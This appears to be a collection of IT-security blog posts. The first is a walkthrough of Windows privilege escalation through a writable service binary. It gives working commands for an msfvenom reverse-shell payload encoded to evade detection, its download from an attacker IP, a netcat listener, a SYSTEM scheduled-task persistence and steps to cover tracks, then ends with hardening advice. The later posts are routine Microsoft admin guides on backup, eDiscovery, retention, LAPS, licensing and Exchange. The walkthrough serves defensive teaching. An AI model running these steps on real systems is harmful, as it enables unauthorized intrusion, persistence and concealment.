Abusing Insecure Services to Gain Privilege Escalation and a Remote Shell

With each story of a new, brazen attack on an enterprise or government network by some "sophisticated" threat actor using "novel techniques", the Twittersphere and public media outlets get whipped into a fear-induced frenzy. Questions about losing some kind of technology-skills arms race, along with trendy new memes, fly around the internet faster than any of us can keep up with. Let's take a moment to look at a method these "sophisticated" attackers use to elevate and maintain access in their victims' networks, then use this example to outline what we good guys need to do to make life difficult for anyone trying to exploit this attack vector.

Establishing a Foothold and Performing Reconnaissance

Attackers most commonly gain a foothold by abusing cloud services and pivoting to remote access, phishing, or just a good ole' fashioned web drive-by. The method really doesn't matter because the reality is: everyone clicks. Eventually, someone in your network will be lured into opening an attachment or clicking on a link, they will be compromised, and we can't stop that.

Once the vulnerable user's system has been compromised, attackers will start to dig for information to map the rest of the network and identify systems of interest. Once they gain access to one of those systems by exploiting a vulnerability or leveraging stolen credentials, the real fun starts. What's the big deal, right? They were able to RDP or gain terminal access to a server, but they don't have the elevated permissions to actually accomplish anything there. We'll see about that.

Let's take a look at all services running on the machine and which executable each service actually runs, focusing on anything outside of the system directory. The goal here is to identify software that might have been installed in a directory that you actually have access to.
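A quick way to do that (a sketch; the exact filter is up to you) is to query Win32_Service and ignore anything under C:\Windows:

# List services whose binaries live outside the Windows directory
Get-CimInstance Win32_Service |
    Where-Object { $_.PathName -notmatch 'C:\\Windows\\' } |
    Select-Object Name, State, StartName, PathName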

Now that we've got a list of potential targets, let's review the permissions on those executables with icacls to see if we have access to change them. In this particular case, the logged-in user has FullControl (F) on the executable and we're in luck!
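For example (the service path here is hypothetical):

# Check who can modify the service binary; look for your user or a broad
# group like BUILTIN\Users holding (F) or (M) rights
icacls "C:\Program Files\VulnApp\vulnsvc.exe"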

Then, from our attack machine (running Kali Linux in this case) we'll use msfvenom to create a payload that will open a reverse shell once executed. A few things to note here: msfvenom is part of the Metasploit Framework and simplifies creation of malicious payloads. In this case we're specifying that we want a reverse shell, which malicious host to reach out to, on what port, and that we want the shell encoded with shikata ga nai to help evade modern detection:
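A minimal sketch of that command, assuming a hypothetical attacker IP of 192.168.45.10 and port 4444:

# x86 payload so the x86/shikata_ga_nai encoder applies; 5 encoding iterations
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o vulnsvc.exe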

Then we’ll move it over to the html directory to be hosted by the local Apache web server. Apache is installed by default in Kali so there’s not much magic here.
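Something along these lines:

# Host the payload on Kali's default Apache web root
sudo cp vulnsvc.exe /var/www/html/
sudo systemctl start apache2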

Then, using PowerShell, we'll download the malicious payload from our Apache instance. Note that we're using PowerShell because it's native to Windows, and this method works because, unfortunately, administrators often don't restrict internet access to known good endpoints:
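A one-liner like this does the trick (same hypothetical IP as before):

# Download the payload from the attacker's web server to a writable location
Invoke-WebRequest -Uri "http://192.168.45.10/vulnsvc.exe" -OutFile "$env:TEMP\vulnsvc.exe"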

Remembering that our end goal is to abuse an insecure service to gain remote access and an elevated command shell, let’s take the known good executable run by the vulnerable service and rename it. We want to keep it around so we can clean up after ourselves later and hide that we were ever there!

And finally, we copy our malicious payload over to replace the original:
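Both steps together look something like this (paths hypothetical, matching the earlier example):

# Keep the original binary so we can restore it later
Rename-Item "C:\Program Files\VulnApp\vulnsvc.exe" "vulnsvc.exe.bak"
# Drop the payload in its place under the original name
Copy-Item "$env:TEMP\vulnsvc.exe" "C:\Program Files\VulnApp\vulnsvc.exe"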

Great! Now, when the service restarts it's going to execute our malicious payload and reach out to the IP that we've specified to establish a remote shell, running with the permissions of the service itself… NT AUTHORITY\SYSTEM!

And of course, on the other end, we need to have something listening to pick up the shell! Using Netcat, we'll open a simple listener on the port we specified when we created the malicious payload. With the Netcat listener in place, we'll reboot the target machine to get the service to restart and our payload to execute. With the shell established, we can use 'whoami' to confirm that we've got elevated permissions on the target machine:
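On the Kali side that's just (port matching the payload above):

# -l listen, -v verbose, -n skip DNS, -p port
nc -lvnp 4444

# Once the shell lands, confirm the context:
# C:\Windows\system32> whoami
# nt authority\system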

Finally, using our elevated access let’s create a little persistence with our remote shell before rolling back the changes to our vulnerable service and deleting the malicious payload to cover up and make it harder to see that we’ve been snooping around:
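A sketch of what that might look like (task name and paths are hypothetical; persistence options are endless):

# One of many persistence options: a SYSTEM scheduled task that runs at boot
schtasks /create /tn "Updater" /tr "C:\Users\Public\update.exe" /sc onstart /ru SYSTEM

# Roll the service back to hide the tampering
Remove-Item "C:\Program Files\VulnApp\vulnsvc.exe"
Rename-Item "C:\Program Files\VulnApp\vulnsvc.exe.bak" "vulnsvc.exe"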

Why was this so easy, and what can we do to protect against these types of attacks?

Well, the first and most obvious thing here is to make sure that our servers are only running software core to the functionality of the server. Leaving administrative tools in place leaves a vulnerable footprint attackers can easily exploit. Tools like Wireshark or VMware Tools can make administrative work more convenient, but they often go unpatched and make our lives more difficult in the long run.

Obviously we need to patch our systems. But that doesn't just mean Windows patches; it means EVERY piece of software on the system. Public exploit databases turn the software running on your servers into a menu of juicy targets. Our vulnerable service may have been fixed in a recent patch!

Then finally, our servers should not be able to reach out to internet locations that are not explicitly trusted. Known public cloud services, Windows Update, threat monitoring tools, and other cloud-hosted management services should be the only places servers are able to access. Initial access would have been significantly more complicated, and our reverse shell would not have worked at all in this case.

Protect Yourself From Ransomware With Azure System State Backup

With 2020 came a seemingly biblical stream of plagues. Obviously COVID-19, murder hornets, social unrest, and… ransomware. Sure, ransomware isn't a terribly new concept, but this year the ante has been upped significantly by the bad guys. Not only have crime groups become more brazen, they're demanding far bigger ransoms, causing cyber insurance companies and their unfortunate customers to struggle.

There are a million things that companies need to consider when it comes to protecting their infrastructure from ransomware, and maybe we'll dive in a little further later. Today, though, we're going to spend some time talking about what you can do to make sure you're able to recover when every domain controller in your organization has been paved over with ransomware or destructive malware.

As you scream ‘But I have backups!’, you might want to stop for a second and think about those backups. Are they performed with an account that has access to everything else (I hope not)? Are the backups themselves stored in a place that’s susceptible to being encrypted? And how long will it take you to actually restore those backups?

Azure System State Backup

Taking advantage of Azure System State Backup is a great way to handle those concerns. The primary benefits here are that the solution involves a simple agent installed on a domain controller, doesn't involve credentials of any kind, stores the backups in an offsite location, and protects those backups from tampering with a host of enhanced security features.

So let's talk about configuration. Since we're configuring a critical resource, work from a PAW (you ARE using PAWs, right?). First, we need to make sure that a Recovery Services vault is available in Azure.
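If you'd rather script that part, a minimal sketch with the Az PowerShell module (resource group, vault name, and region are placeholders):

# Create a resource group and a Recovery Services vault to hold the backups
Connect-AzAccount
New-AzResourceGroup -Name "rg-backup" -Location "eastus"
New-AzRecoveryServicesVault -Name "DCBackupVault" -ResourceGroupName "rg-backup" -Location "eastus"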

Then, in that recovery services vault we’ll configure a backup:

Since a domain controller backup only involves the system state, it's a simple configuration. A system state backup will ensure that SYSVOL and registry configurations are retained.

Then, when prompted, download the MARS agent, move it to the domain controller, and start the install. The agent requires the Visual C++ runtime, so if it's not already installed, setup will take care of that for you.

Then select where you'd like the agent to be installed:

Backups are shipped to Azure over encrypted, outbound connectivity initiated by the MARS agent. If you'd like to proxy that connectivity, configure it next.

Make sure that the agent is configured to be able to update itself moving forward:

Then, finish the installation and the agent will prompt you to register it.

To register the agent, go back to the backup that you configured in Azure and, in the properties of the backup, ensure that you've declared you're using the latest MARS agent, download the backup credentials, and transfer them to the domain controller you're working on.

Select the previously exported credentials and move forward:

Next, you’ll need to generate a passphrase that will be used when restoring the backup. You can either specify your own, or let the setup generate one for you. Select Browse and specify where you’d like to export that passphrase. This needs to be protected because you won’t be able to restore if the secret is lost. Azure Key Vault (which we’ll talk about on a later date) is a great option here.

Now that registration is complete, you’ll want to schedule your backups. Open the Azure Backup agent and on the right side, select ‘Schedule Backup’.

Since we’re only backing up the system state, select ‘Add Items’ and ‘System State’.

Finally, ensure you’re taking daily backups and we’ll take a look at retention of those backups.

Retention depends entirely on your RTO/RPO strategy, but typically restoring a domain to a point too far in the past has little value at all. I've chosen to perform daily backups and retain them for 14 days, but you might find it more reasonable to only maintain 7 days of daily backups, plus maybe 4 weekly backups to be used in fringe cases.

Finally, we confirm that the schedule is what we need it to be and move forward through the setup.

So there you have it. Nothing complicated at all, and while we touched on a handful of topics we'll pick up later, we've done some good work! Often, people use complicated or expensive backup/storage solutions that put them at risk for credential theft or data destruction in worst-case scenarios. Azure System State Backup is neither expensive nor complicated, and it ensures that you'll be able to quickly and confidently recover from disaster.

eDiscovery in Office 365

Now that we've spent a few minutes going over data retention and destruction in the service to make sure you're retaining the data you're obligated to keep, let's take a bit of time to make sure you're able to quickly and reliably identify information. Why? Because there are times when you'll need to export copies of data for legal reasons, delete phishing attempts, or just find out if a message was read by someone.

I'll spend time outlining PowerShell syntax in the examples here to help cut down on human error. Most people who are averse to using the command line are uncomfortable because the syntax is difficult to remember or the process seems arcane. It's often beneficial to leverage the shell for discovery because it lets you be more granular with your searches, reducing the cost of first-pass litigation review by outside counsel (the numbers are scary). It also allows you to document the search syntax to ensure reliable internal knowledge transfer, and it simplifies repeated searches by letting the individual performing the search copy/paste the actual search commands.

Before you'll even be able to connect to the service via PowerShell, you'll need to make sure that you have the right level of permission. With RBAC (Role Based Access Control) it's possible to scope permissions within the compliance center so that individuals who don't need access to things like email security settings or the audit log get eDiscovery only. In most cases the eDiscovery Administrator role will be enough for discovery activities, but if those individuals also need to be able to purge data, they'll need the "Search and Purge" role as well, which is only part of the Organization Management role group by default. A little more information on those permissions can be found here, along with a quick reference on how to assign role group members to a role. And since it's easy for an attacker to use eDiscovery to exfiltrate data, don't forget to require multifactor authentication for individuals with eDiscovery permissions!

Now that you've got the permissions taken care of and we've touched on ensuring MFA is enabled, you'll need to connect to the security and compliance center using the Exchange Online PowerShell module. Once the module is installed, it's just a simple one-line command to connect.

Connect-IPPSSession -UserPrincipalName matt@collab-crossroads.com

Once you're connected, the syntax is simple. We'll be working with the New-ComplianceSearch command to identify the potentially malicious message below:

The search syntax is simple. We know the message we want to identify was sent on 4/4 and has 'Test' in the subject and body. We're not sure who else might have gotten this particular message, so we'll check every mailbox in the organization by using 'All' for the Exchange location. The search is Boolean, so there are a couple of gotchas every now and then. In this case, note the parentheses around the sent and received dates. We need to make sure those are evaluated first, so we put them in a block before moving on to the less complicated keyword search in the subject. We won't get into the complexities of script blocks; just know that it works like simple math: we evaluate what's in parentheses first before moving on to the rest.

New-ComplianceSearch -Name "Test Search" -ExchangeLocation all -ContentMatchQuery '(sent>=04/01/2019 AND sent<=04/05/2019) AND subject:"Test"'

Once you’ve created the search, start it using:

Start-ComplianceSearch "Test Search"
Depending on how complex the search is it might take a while to complete. In our case it’s a single message in a single mailbox so it completes very quickly and you can see the results using:
Get-ComplianceSearch "Test Search"

There are a number of really handy metrics that Exchange reports on that you might be interested in from time to time. The obvious ones are who started the search, whether it's completed, how long it took, and how many items were found.

If you pipe the Get-ComplianceSearch command to Format-List (FL), it will format the results as a list and show you everything you can select from. Since we only want a subset of these results, you can select specific properties from the previous command.
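For example (property names here are the common ones; check the Format-List output for what your tenant actually returns):

# Everything the search object exposes
Get-ComplianceSearch "Test Search" | Format-List

# Just the metrics we care about
Get-ComplianceSearch "Test Search" | Select-Object RunBy, Status, JobEndTime, Items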

Now that we've confirmed the results are what we were looking for, we can take action on those results using the New-ComplianceSearchAction command. Before choosing to delete anything, always make sure to preview and export a copy:
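A sketch of both actions against our search:

# Generate a preview of the matched items
New-ComplianceSearchAction -SearchName "Test Search" -Preview

# Export a deduplicated copy, one PST per mailbox
New-ComplianceSearchAction -SearchName "Test Search" -Export -EnableDedupe $true -ArchiveFormat PerUserPst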

A couple things to note here: first, we're deduplicating results in the export using the -EnableDedupe parameter. Next, we're choosing to export a PST per mailbox using the -ArchiveFormat parameter. Since the compliance center temporarily stores the export in Azure blob storage, it's not possible to actually download the export through PowerShell, so we'll go into the compliance center to download it. Under Search and Investigation and Content Search you'll see the search we just created. Selecting the Exports tab will show the export as well:

Since Google deprecated ClickOnce support in Chrome, you'll need to use Internet Explorer to install the small agent required to download the export. Once you click the "Download results" button within the export request, you'll be prompted to install the agent. Then you'll be prompted for the export key shown below, as well as an export location to save your export.

Now that we’ve made sure that we’re deleting the right content and have a copy of that content, let’s go ahead and delete it. The New-ComplianceSearchAction command will be used here as well.

New-ComplianceSearchAction -SearchName "Test Search" -Purge -PurgeType SoftDelete -Confirm:$false

After verifying that the action was completed using the Get-ComplianceSearchAction command, you can see that the message in question was indeed removed:
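For reference, the purge action is named after the search, so checking on it looks like:

Get-ComplianceSearchAction "Test Search_Purge"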

In this scenario we focused on deleting a potentially malicious email (phishing, malware, or malicious insider) from a mailbox. The process of exporting data for a litigation search is identical, with the exception that you’re not actually deleting the data. Next time we’ll take a look at using the threat explorer to accomplish the same activity!

Data Retention and Destruction in Office 365

As organizations continue to invest heavily in cloud collaboration, the amount of information maintained in the form of documents, emails, or instant messages can balloon rapidly. Moving that data into a single space like Office 365 is a huge win in terms of discovery for admin and litigation teams, and usability for end users, but the incredible amount of space available to users means there’s a larger burden on administrators to ensure that data is both discoverable, and destroyed when it becomes older than the organization’s legal compliance period.

The first part of this is simple: you need to make sure that data retention is configured for your organization. Not only is this handy for meeting your compliance requirements, it helps with overcoming the 'oops' moment when end users accidentally delete data, it enables you to take advantage of inactive mailboxes to save licenses, and it helps you recover from malware in your tenancy by leveraging versioning in OneDrive and Teams.

To quickly enable retention, head to the security and compliance center and select ‘Retention’ from the Data Governance panel.


When you elect to create a new policy you'll be prompted to name it and identify exactly what you'd like it to do. In this case, we're electing to retain data for seven years and delete it after that duration. Depending on your requirements you may opt to retain data indefinitely without deleting it, or create a pure data-destruction policy that deletes all data after a certain period. Note that the advanced options allow you to target specific data types, such as personally identifiable information and financial information, based on global standards. You can also create your own data tags or policies to enforce if you have a special requirement.


Now that you've clarified how long you'd like to keep your data and whether you'd like it purged after that period, you need to identify which data locations the policy should apply to. Note that you'll need to create two retention policies: one for default locations like OneDrive, Exchange, and SharePoint, and a dedicated one for Teams chat and channel messages, since Teams stores that data in an Azure chat service.
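For reference, the same split can be scripted from the compliance PowerShell session used in the eDiscovery walkthrough above; a sketch assuming the seven-year keep-and-delete settings (2,555 days), with the policy names as placeholders:

# Policy and rule for the default workloads
New-RetentionCompliancePolicy -Name "Retain 7 Years" -ExchangeLocation All -SharePointLocation All -OneDriveLocation All
New-RetentionComplianceRule -Name "Retain 7 Years Rule" -Policy "Retain 7 Years" -RetentionDuration 2555 -RetentionComplianceAction KeepAndDelete

# Separate policy and rule for Teams chat and channel messages
New-RetentionCompliancePolicy -Name "Retain 7 Years - Teams" -TeamsChatLocation All -TeamsChannelLocation All
New-RetentionComplianceRule -Name "Retain 7 Years Teams Rule" -Policy "Retain 7 Years - Teams" -RetentionDuration 2555 -RetentionComplianceAction KeepAndDelete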


Now that we've got our bases covered in terms of data retention, we'll circle back soon to discuss eDiscovery practices, search and destroy of malicious content, and leveraging the Threat Explorer in the compliance center to make that process easier.

 

So it’s 2019, and we’ve got phishing well in hand. Right?

Let's face it, phishing is not new; forms of social engineering have been around for as long as we've been trying to protect information on the internet. Anyone responsible for protecting their organization's users from unsolicited spam or social engineering can tell you that phishing definitely still occurs on a regular basis. What many organizations don't realize is that not only is phishing still occurring, it's becoming more complex, occurrences are increasing at an alarming rate, and user behavior is not changing at the same pace.

People Click Links

I had a great opportunity to hear a couple of my peers speak recently; they referenced Verizon's Data Breach Investigations Report (DBIR) from 2018 and pointed out a few alarming trends.

First, let's start with the scary one: sanctioned phishing campaigns uncovered that a small subset of individuals click on literally every link that lands in their inbox:

“Unfortunately, on average 4% of people in any given phishing campaign will click it”


OK, so it's only 4%. That's not that bad, right? Well, consider a couple of things: first, individuals who have clicked links in the past are far more likely to continue that trend; second, 4% of some of the largest organizations is not a trivial number at all. Walmart? 2.3M employees. JPMorgan? 256k employees. I wrote recently that a single compromised user gives an attacker a foothold in your organization and is often the start of a major data breach.

So now that we know some individuals are susceptible, let's look at the brighter side of that number: almost 80% of users never click a single link at all.

Reporting Incidents

It's not a huge secret that vendors today rely heavily on reported samples to improve detection rates. What is pretty interesting is that the vast majority of phishing campaigns go unreported, with only 17% being reported at all. This means you have no idea how effective you are at blocking those messages inbound, and that there are plenty of instances where potentially malicious content has been viewed inside your organization without your knowledge.


Bringing it All Together

Now that we’ve got a little transparency into some raw numbers, let’s spend a minute on a more positive note and outline some great features available to help combat the knowledge gap in end users and the drastic increase in inbound phish attempts.

Microsoft’s Security Intelligence Report outlines the increase in phishing messages their service identifies. They handle over 470 billion messages per month and saw a 250% increase over the span of 2018.


As phishing campaigns become more and more complex, so has the way service providers protect their end users from zero-day threats. Microsoft leverages the sender-side signals of those 470 billion messages to build a first-contact graph and apply machine learning for impersonation protection. On top of that, ATP adds Safe Links and Safe Attachments protection for Office. The technology proxies every single end-user click through a Microsoft server to validate the target URL before directing the user there. The cool thing about that? Safe Links works in Office, including Office Mobile for your remote users, and URLs embedded in attachments are equally protected.

Microsoft certainly isn't the only provider making great strides on the email front; vendors like Proofpoint, FireEye, Palo Alto, Menlo, and others have innovated in their own right as well. The thing that sets Microsoft apart is that they handle vastly more mail than other vendors and leverage machine learning and artificial intelligence to turn that data into better protection for their users.

Keep up the Good Fight

Unfortunately the world isn’t going to become a peaceful place overnight and people aren’t going to suddenly become benevolent to their neighbors. While I’ll keep waiting for that day to come and doing my part to see it to fruition, I’ll also work just as hard to stay on top of emerging trends to make the internet a safer place for everyone to learn, collaborate, and enjoy a bottomless sea of cat memes.

Big thanks to Cam and Daniel for sharing sources for data.

 

 

Unique Local Admin Passwords – How and Why.

So here we are, early 2019, just a few months removed from a data breach at Marriott that saw over 500 million guests' personal information hit the public internet. If that sounds like an insane number, you're absolutely right! That's nearly 6% of the world population and about 150% of the population of the US.

So the big question is how. How do things like this happen, how do attackers gain so much information, how do they exfiltrate the data, and how is it so common that Forbes is over here making cyber predictions for 2019!?

A while back I wrote about securing privileged access with a brief, high-level overview of how an attacker works to gain access in an organization and keep it. Part of that process is making use of local admin credentials harvested from the first compromised machine to pivot around the network and see what else those credentials work on. Sounds harmless enough, but what if the machine they gain access to is a domain controller? Or the workstation of an admin who happens to have administrative privileges on his daily account?


This activity is difficult to detect because the attacker is using valid credentials to pivot around the network, digging for more information or waiting for an admin to slip up. The first step to stopping this is attacking the first link in the kill chain and limiting privilege escalation on other workstations. How? By making sure the next workstation doesn't have the same administrative password as the one the attacker already has.

Enter LAPS! The first part of the solution involves deploying an agent to each workstation and server on the network. That agent can be downloaded here. Since Microsoft was kind enough to provide the package as an MSI, it's easy enough to deploy with a script (msiexec /i \\fileserver\share\LAPS.x64.msi /quiet), Intune if you're into co-management, or good ole' fashioned SCCM. Definitely be sure to update your images to include the agent as well! Once that's deployed and imaging has been updated, admin users need to run the installer on their PAWs (you are using a privileged access workstation, right?) to get the management client, PowerShell module, and GPO templates for management.


The next step is to make sure the Active Directory schema is taken care of. We need to extend the schema to include the attributes we'll be working with, and then update permissions to account for users who shouldn't be able to see those attributes. To extend the schema, use one of the admin workstations we just installed the management tools on, import the module in a PowerShell session, and update the schema:

Import-Module AdmPwd.PS
Update-AdmPwdADSchema


After waiting a short while for that schema change to replicate, we'll move on to making sure only specific users and computers have access to the AD attribute that now stores these passwords. The first step is to remove permissions for groups at the OU level. If you've blocked inheritance, you'll need to take care of any nested OUs as well.

  1. Open ADSIEdit
  2. Right Click on the OU that contains the computer accounts that you are installing this solution on and select Properties.
  3. Click the Security tab
  4. Click Advanced
  5. Select the Group(s) or User(s) that you don’t want to be able to read the password and then click Edit.
  6. Uncheck All extended rights

*Be sure to preview all extended rights permissions first to make sure you aren't removing permissions required by that group of users; the cmdlet shown below can help with that preview.
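The LAPS module ships a cmdlet that reports who currently holds extended rights on an OU (the OU path here is a placeholder):

# Report which principals can read confidential attributes in this OU
Find-AdmPwdExtendedRights -Identity "OU=Servers,DC=domain,DC=com" | Format-Table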


Now that we've taken care of scoping away permissions from unintended users and computers, we need to make sure that the machines themselves have access to write to this attribute so they're able to update their own passwords as they expire.

Set-AdmPwdComputerSelfPermission -OrgUnit "OU=Servers,DC=domain,DC=com"


We’ll grant individual admin groups access to read those randomized admin passwords:

Set-AdmPwdReadPasswordPermission `
-OrgUnit "OU=Admins,DC=domain,DC=com" `
-AllowedPrincipals Domain\PasswordAdmins

And of course we need to account for password resets as well so let’s add reset permissions:

Set-AdmPwdResetPasswordPermission `
-OrgUnit "OU=Admins,DC=domain,DC=com" `
-AllowedPrincipals Domain\PasswordAdmins

Finally, you’ll want to hop into Group Policy on that admin workstation you installed the tools on to establish the password policy settings you’ll be enforcing on those workstations and servers.


There's quite a bit here to chew on, but it's not technically challenging, so give it a try in a lab, then roll it out to your user workstations and eventually the servers as well! Again, the idea here is to limit lateral movement and make elevation of privilege more and more difficult for bad actors.

We’ll have another shorter session to go over some of the day to day admin tasks like looking up those passwords and resetting them, but that day is not today!

Securing Privileged Access – Part 1

After a little bit of a holiday hiatus, we're back to start a segment on securing privileged access. When we refer to privileged access we're talking about everything from the different levels of administrative access to privileged users who might handle extremely sensitive data for your organization.

So many organizations still believe that traditional firewalls are enough to keep the big, bad internet at bay. In the modern enterprise it's foolish to believe you can keep your data within any boundary while your users work remotely, leverage third-party SaaS storage (Dropbox, Google Drive, OneDrive, etc.), or while you host your data in an enterprise cloud like Office 365. I'm not here to tell you those firewalls aren't absolutely necessary, but it's important to realize that the days of treating your firewall as the security boundary are over; you need to work hard to secure identity, regardless of where your data is hosted.

Recognizing that, let’s take a look at how a typical credential theft takes place in an organization:


An attacker is going to establish a foothold in your organization by targeting end users with social engineering or phishing attacks. Once they've got access to that user's computer they'll start working on lateral movement, meaning they'll begin reaching out to other computers and servers on the network to see what else can be compromised. Maybe it's by exploiting non-unique local admin passwords, maybe the originally breached user has access elsewhere, or maybe an admin isn't using a separate account for admin activities. They pivot further and further until they gain control of the directory database, whether through actual domain admin permissions, by exploiting misconfigurations, or through server agent configuration.


The first step is a simple one, and in many organizations it's already well ingrained in IT culture: administrators need dedicated administrative accounts that are not shared with any other admins. I work with too many customers where this isn't the case. Some have a generic account with domain admin that's used for automation or just 'general use', or they flat-out grant admin permission to a day-to-day account. Admin roles in your org should be reported on regularly to identify these, and there should be alerts for elevation of privilege with an actual process for following up on them.

The next steps are, again, not technically challenging, but they require culture change that many admins are averse to. Privileged Access Workstations need to be deployed for users holding high-value admin roles, and unique local admin passwords need to be deployed to workstations first and then servers to help stop lateral movement. I'll come back to these two topics later with dedicated articles; for now, know that they need to be accomplished and prioritized.

Now that we’ve touched on high level goals of attackers and the first steps required to secure privileged access, I’ll follow up soon with part two. I’ll be working through Microsoft guidelines published here so definitely feel free to read ahead a little and ask questions!

Implementing Group Based Licensing in Office 365

So here we are on election day, and if you're like me, you're probably more than a little bit ready to think about something other than someone else's political opinion. Well, here I am to help you out with a little ditty on licensing your users in Office 365.

Since managing licenses for thousands of individuals can become a struggle, most organizations use some kind of automation. Something like the sample below can be scheduled to run and apply licenses with specific features based on a specific scenario. This works great if you don't have any other options, but group-based licensing doesn't require any kind of on-premises (or Azure) automation, so if you've got licensing for it, definitely use it!

if ($_.UserPrincipalName -like "*@domain2.com") {

    # Disabled plans - customize to meet the needs of this business unit
    $DisabledPlans = @()
    $DisabledPlans += "Stream_O365_E3"
    $DisabledPlans += "TEAMS1"
    $DisabledPlans += "DESKLESS"
    $DisabledPlans += "FLOW_O365_P2"
    $DisabledPlans += "POWERAPPS_O365_P2"
    $DisabledPlans += "OFFICE_FORMS_PLAN_2"
    $DisabledPlans += "PROJECTWORKMANAGEMENT"
    $DisabledPlans += "YAMMER_EDU"
    $DisabledPlans += "EXCHANGE_S_STANDARD"
    $DisabledPlans += "MCOSTANDARD"

    Set-MsolUser -UserPrincipalName $_.UserPrincipalName -UsageLocation US
    $AccountSkuId = "org:LicenseName"
    $Option = New-MsolLicenseOptions -AccountSkuId $AccountSkuId -DisabledPlans $DisabledPlans
    Set-MsolUserLicense -UserPrincipalName $_.UserPrincipalName -LicenseOptions $Option -AddLicenses $AccountSkuId
}
elseif ($_.UserPrincipalName -like "*@domain.com") {

    # Disabling only EXO for another business unit
    $DisabledPlans = @()
    $DisabledPlans += "EXCHANGE_S_STANDARD"

    Set-MsolUser -UserPrincipalName $_.UserPrincipalName -UsageLocation US
    $AccountSkuId = "org:LicenseName"
    $Option = New-MsolLicenseOptions -AccountSkuId $AccountSkuId -DisabledPlans $DisabledPlans
    Set-MsolUserLicense -UserPrincipalName $_.UserPrincipalName -LicenseOptions $Option -AddLicenses $AccountSkuId
}

 

The catch is that you'll want to use a dynamic group, and that requires a membership filter. If you apply a dynamic group and the filter is wrong, you might unlicense users or overcommit, causing service disruption for those users. The first step is to determine which users need which licenses. The easy ones to consider are any users with mail hosted in Exchange Online that require licensing (everything but resource, shared, or discovery mailboxes). Those mailboxes will need to be included in the dynamic group we'll create next, so let's gather everything else that needs to be excluded.

$Resources = Get-RemoteMailbox -ResultSize Unlimited | Where-Object {($_.RecipientTypeDetails -ne 'UserMailbox') -and ($_.RecipientTypeDetails -ne 'DiscoveryMailbox')}

 

Now that we've gathered what needs to be excluded from the group, let's update an on-premises attribute that replicates to Azure and can be filtered on. I prefer to use extensionAttribute1-15 if they're available, but I also leverage the 'info' attribute on premises so you can be granular with scripting logic later if you have to. In my case I chose to filter out anything with the word 'Resource' in extensionAttribute1:

$Resources | ForEach-Object {

    [string]$upn = $_.UserPrincipalName

    $user = Get-ADUser -Properties info,extensionAttribute1 -Filter {UserPrincipalName -eq $upn}

Since the info attribute may already contain data, we want to make sure we don't bulldoze what's already in the attribute before setting it. In this case we check whether anything is there; if there is, we'll add 'Resource' on a new line in the same attribute.

    if ($null -eq $user.info) {
        Set-ADUser $user -Replace @{info='Resource';extensionAttribute1='Resource'}
    }
    else {
        Set-ADUser $user -Replace @{info="$($user.info)`r`nResource";extensionAttribute1='Resource'}
    }
}

 

Great! Now that we've set an attribute for the filter to exclude, let's make the dynamic group in Azure to assign those licenses to. Since I'm a shell kind of guy, here's a sample to create the group.

New-AzureADMSGroup -DisplayName "Licensing – E3" `
-Description "Dynamic group created to automatically assign licenses to mail enabled users" `
-MailEnabled $False -MailNickName "group" -SecurityEnabled $True -GroupTypes "DynamicMembership" `
-MembershipRule "(user.mail -ne null) -and (user.accountEnabled -eq true) -and (user.extensionAttribute1 -ne 'Resource')" `
-MembershipRuleProcessingState "On"

 

Now that the more complicated portion, creating a dynamic group that fits your users, is out of the way, the last thing left to do is follow the simple documentation to assign licenses and features to that particular group.

Here's to my favorite kind of people out there, those who know how to stuff the ballot box as well as their faces! #VotePizza #ChicagoStyle #LouMalnatis


Exchange 2019 – Why?

With the formal release of Exchange 2019, the Exchange world was shaken up (yet again), and the main question most of us have is: why? Since upgrading Exchange in your environment isn't exactly a small task, why should you jump to the new, fancy flavor? Well, let's hop right into that!

Security


Exchange 2019 is the first flavor of Exchange that fully supports deployment on Windows Server Core. How is that a security improvement? Well, since Core is lightweight, containing only the essentials, there's a drastically reduced attack surface.

Not sold on Core? How about this: Exchange 2019 out of the box will only use TLS 1.2.

Uptime


We talked about Core, right? Since it doesn't install features and components that aren't absolutely necessary (Internet Explorer? Media Player?), there are fewer patches to deploy, and fewer still that require a reboot. Assuming you follow the preferred architecture when you deploy, there should be no problems with rebooting, but why chance it when you don't have to?

Not only that, but with major enhancements to search indexing, the catalog fails over much, much faster, and who isn't a fan of that?!

 

Performance

With Exchange 2016 there were scalability struggles. Manufacturers started producing larger physical servers and Exchange supportability flat out didn't cover them, which led to complicated virtual deployments and customers working outside of supportability guidelines. Exchange 2019 now supports up to 48 (physical) cores and 256 GB of RAM.

Search was also drastically changed to leverage Bing technology, so failovers happen more quickly and reliably. How, you ask? By storing the search indexes within the databases themselves and shipping index data along with database log shipping.

SSDs! For the longest time they were supported, but not technically recommended due to cost and capacity. The read latencies of spinning disks haven't improved at the same pace as physical capacity, and it's tough to read TBs of data fast enough on disks spinning at only 7,200 RPM. How was that addressed? MCDB (MetaCache DataBases)! Basically, a portion of the most actively accessed data is stored on the SSDs, which improves performance drastically. Since MCDB is entirely new and a little complicated, I'll come back and write about it in detail soon.


Up next is a two-parter about preparation and installation!

Managing Major Changes to Office 365

Admins are expected to keep tabs on major changes to the service and understand how those changes could impact uptime, or just good ole' fashioned end-user experience. Unfortunately, there are hundreds of items coming down the pipe that may or may not be relevant to every organization, and it's difficult to follow it all.

The first part of making that manageable is understanding how Microsoft's release options work. Updates are released to different update 'rings' as they mature. The first three rings are Microsoft release teams, where Microsoft consumes the updates first, prior to formal release to the rest of the world.


After that, you can select to add friendlies to the targeted release group. These would typically be IT groups or power users who will be a little more adaptive to change. Here are a few of the benefits of making sure you have decision makers in the targeted release group:

  • Test and validate new updates before they are released to all the users in the organization.
  • Prepare user notification and documentation before updates are released worldwide.
  • Prepare internal help-desk for upcoming changes.
  • Go through compliance and security reviews.
  • Use feature controls, where applicable, to control the release of updates to end users.

Here’s how you can add individuals to targeted release.

Handy, right? Here's a super common use case: Teams was released about a year ago and most customers had no idea exactly how it would impact them or how their users would cope. The feature was added to enterprise licensing and enabled by default upon standard release. The trouble? End users were able to go to http://teams.microsoft.com and create a new team with any name and any picture, which shows up in the address book with (at the time) no central management and could potentially be shared with the wide world of the internet. Mayyyybe you might want to review that feature to make sure you have controls in place that match your organization's goals.


In addition to release options, you'll want to make sure that your team is monitoring the message center for major updates.


Updates in the service come at you pretty fast, but Microsoft does a pretty decent job of providing information and allowing you to plan for them. Make sure you keep an eye on the roadmap, the message center, and of course make use of targeted release to find out how those changes will impact your users!

Now don’t mind me while I go drown myself in meaningless college football games!
